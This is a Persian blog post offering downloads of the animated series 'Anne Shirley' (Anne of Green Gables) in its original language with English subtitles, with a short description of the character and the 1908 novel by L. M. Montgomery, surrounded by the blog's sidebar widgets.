نوشته شده توسط حمیدرضا در تاریخ پنجشنبه، 26 خرداد ماه 1390
 
دانلود کارتون به یادماندنی آنشرلی با موهای قرمز Anne Shirley Full
Episode
کارتون به یادماندنی آنشرلی با موهای قرمز برای اولین بار به صورت اورجینال

به دلیل درخواست های مکرر شما عزیزان این کارتون را به صورت زبان اصلی و همراه با زیرنویس انگلیسی برای دانلود آماده کرده ایم.زیرنویس درون فیلم قرار دارد.اگر دوبله این کارتون را پیدا کردید به ما اطلاع دهید

قسمت های 1 تا 5 آماده دانلود شده است

حتما همه شما عزیزان آنشرلی را می شناسید.آنی شرلی دختری کک‌مکی است که موهای سرخی دارد و در یتیمخانه بزرگ شده‌است. او باهوش است، قوهٔ تخیل بی حد و مرزی دارد و با امید و پشتکار و مهربانی‌های ساده اش، سعی می‌کند زندگی جدیدی را آغاز کند. هرچند برای ورود به این دنیای تازه باید سختی‌های بسیاری را پشت سر بگذارد، ولی آینده در نظرش آنقدر زیبا و امیدبخش است که برای رسیدن به آن، با هر مشکلی کنار می‌آید و با هر شرایطی سازگار می‌شود.
آنشرلی  نام یک شخصیت داستانی است که نخستین بار در رمان آن شرلی در گرین گیبلز ۱۹۰۸ نوشته لوسی ماد مونتگمری معرفی شد.
این کارتون به یادماندنی دارای 50 قسمت می باشد که به مرور برای دانلود آماده خواهد شد.این کارتون خاطرات خیلی از شما عزیزان را زنده خواهد کرد.در صورتی که لینک های دوبله این کارتون را پیدا کردید به ما اطلاع دهید

برای دیدن تصاویری از کارتون و دانلود به ادامه مطلب مراجعه نمایید
 

 

 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز :
بازدید دیروز :
بازدید هفته :
بازدید ماه :
بازدید کل :
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس